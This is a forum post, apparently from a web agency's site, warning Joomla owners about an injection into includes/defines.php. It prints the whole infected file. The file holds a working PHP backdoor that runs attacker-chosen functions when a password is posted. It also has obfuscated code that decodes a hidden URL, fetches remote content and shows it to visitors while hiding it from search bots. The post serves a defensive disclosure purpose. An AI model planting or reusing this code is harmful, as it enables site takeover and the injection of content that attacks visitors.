×
Looking for new moderators. Inquire within. (06 Oct 2015)

Looking for new moderators. Inquire within. Let us know if you are interested in participating. Great opportunity to network.

Joomla BASEcode64 Injections in defines.php

More
1 year 5 months ago - 1 year 5 months ago #42 by Susan Smith
Susan Smith created the topic: Joomla BASEcode64 Injections in defines.php
Hi we have seen this injection into the includes/defines.php and administrator/includes/defines.phpfiles here is what a modified file looks like:
<?php
/**
 * @package    Joomla.Administrator
 *
 * @copyright  Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Global definitions
$parts = explode(DIRECTORY_SEPARATOR, JPATH_BASE);
array_pop($parts);

// Defines
define('JPATH_ROOT',          implode(DIRECTORY_SEPARATOR, $parts));
define('JPATH_SITE',          JPATH_ROOT);
define('JPATH_CONFIGURATION', JPATH_ROOT);
define('JPATH_ADMINISTRATOR', JPATH_ROOT . DIRECTORY_SEPARATOR . 'administrator');
define('JPATH_LIBRARIES',     JPATH_ROOT . DIRECTORY_SEPARATOR . 'libraries');
define('JPATH_PLUGINS',       JPATH_ROOT . DIRECTORY_SEPARATOR . 'plugins');
define('JPATH_INSTALLATION',  JPATH_ROOT . DIRECTORY_SEPARATOR . 'installation');
define('JPATH_THEMES',        JPATH_BASE . DIRECTORY_SEPARATOR . 'templates');
define('JPATH_CACHE',         JPATH_BASE . DIRECTORY_SEPARATOR . 'cache');
define('JPATH_MANIFESTS',     JPATH_ADMINISTRATOR . DIRECTORY_SEPARATOR . 'manifests');
//istart


function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function request_url_data($url) {

    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}
error_reporting(0);
$_passssword = '22193ec33a40d7d54dedb09852cbfbc4';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');




if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
if ($_SERVER['REQUEST_METHOD'] != 'GET')
    $bad_url = true;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
//    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
//        $url = base64_decode('a3d3czksLDEzMC0yOjEtMTY2LTYyLGFvbGQsPHNscXBga2YldnduXHBsdnFgZj4yOzU0MDk0NjMwMjE5MjozMw==');
    $url = decrypt_url('a3d3czksLDEzMC0yOjEtMTY2LTYyLGFvbGQsPHNscXBga2YldnduXHBsdnFgZj4yOzU0MDk0NjMwMjE5MjozMw==');
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iend

If you have been infected look (Red Flag) for a white page in IE 9plus and overwrite your files in :
administrator/includes/defines.php
includes/defines.php
Last Edit: 1 year 5 months ago by Susan Smith.

Please Log in to join the conversation.

Time to create page: 0.416 seconds

20 Years of Marketing Success!

Since 1997

Contact Webtradenow

525 Titus Rd.
Rochester, N.Y. 14617

Telephon: (888) 604.0447
Local: (585) 210.3987
Email: info@webtradenow.com
Web: www.webtradenow.com